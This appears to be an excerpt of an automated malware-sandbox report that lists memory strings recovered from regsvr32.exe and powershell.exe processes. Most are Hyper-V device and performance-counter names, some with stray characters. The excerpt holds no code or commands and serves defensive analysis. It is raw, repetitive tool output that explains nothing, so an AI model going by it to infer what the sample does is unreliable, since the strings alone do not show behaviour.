Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipesh
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mqabcqtdeleiepv Busw
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor\X
Source: regsvr32.exe, 0000000E.00000003.1943302476.0000000002D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionl
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesZ
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: regsvr32.exe, 0000000E.00000003.1917333141.0000000002D49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost_
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: regsvr32.exe, 00000007.00000003.1733544491.0000000002890000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1741891317.0000000002890000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1743831001.0000000002890000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1739588798.0000000002890000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1728667072.0000000002890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824I
Source: regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot&
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll6
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid PartitionT
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2025223425.0000000002C8B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServiceZ
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipess
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesB
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mqabcqtdeleiepv BusF
Source: regsvr32.exe, 0000000E.00000003.1943264950.00000000046B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost_
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processorh
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root PartitionQ
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor
Source: regsvr32.exe, 0000000E.00000003.1917102815.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1943159264.00000000046B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB F
